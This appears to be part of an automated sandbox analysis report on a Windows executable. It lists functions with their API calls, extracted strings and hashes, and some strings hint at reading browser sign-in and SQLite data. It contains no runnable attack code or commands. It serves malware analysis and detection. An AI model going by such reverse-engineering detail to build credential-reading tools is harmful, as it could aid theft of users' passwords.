                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                    • String ID: strings
                                                                                                                                                                                    • API String ID: 3166385802-3030018805
                                                                                                                                                                                    • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                                                                                                    • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                    • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                                                                                                    • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                    Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                    • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                    • String ID: AE$.cfg$General$EA
                                                                                                                                                                                    • API String ID: 776488737-1622828088
                                                                                                                                                                                    • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                                                                                                    • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                                    • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                                    Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                    • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                    • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                      • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                      • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                    • String ID: sysdatetimepick32
                                                                                                                                                                                    • API String ID: 1028950076-4169760276
                                                                                                                                                                                    • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                                                                                                    • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                                    • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                                    Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                                                    • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                                                    • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                                                    • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                    • String ID: -journal$-wal
                                                                                                                                                                                    • API String ID: 438689982-2894717839
                                                                                                                                                                                    • Opcode ID: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                                                                                                                                                    • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                                    • Opcode Fuzzy Hash: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                                                                                                                                                    • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                                    Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                      • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                      • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3975816621-0
                                                                                                                                                                                    • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                    • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                    • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                                                    Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                    • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                    • API String ID: 1214746602-2708368587
                                                                                                                                                                                    • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                                                                                    • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                                                    • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                                                                                    • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                                                    Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                                                                                                    • memset.MSVCRT ref: 00405E33
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                                                                                                    • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2313361498-0
                                                                                                                                                                                    • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                                                                                    • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                                                                                    • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                                                    Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                      • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2047574939-0
                                                                                                                                                                                    • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                                                                                    • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                                                    • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                                                    Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4218492932-0
                                                                                                                                                                                    • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                    • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                    Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                    • API String ID: 438689982-4203073231
                                                                                                                                                                                    • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                    • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                    • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                    Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                    • API String ID: 3510742995-2446657581
                                                                                                                                                                                    • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                    • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                                                    • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                    • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                                                    Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                    • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                    • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                    • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                    • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4281309102-0
                                                                                                                                                                                    • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                                                                                                    • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                                                    Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _snwprintfwcscat
                                                                                                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                    • API String ID: 384018552-4153097237
                                                                                                                                                                                    • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                                                                                                    • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                                                    • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                                                                                                    • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                                                    Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                    • API String ID: 2029023288-3849865405
                                                                                                                                                                                    • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                                                                                                    • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                                                    • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                                                                                                    • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                                                    Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                    • memset.MSVCRT ref: 00405455
                                                                                                                                                                                    • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                    • memset.MSVCRT ref: 00405483
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                    • String ID: 6$\
                                                                                                                                                                                    • API String ID: 404372293-1284684873
                                                                                                                                                                                    • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                                                                                                    • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                                                                                                    • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                                    Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
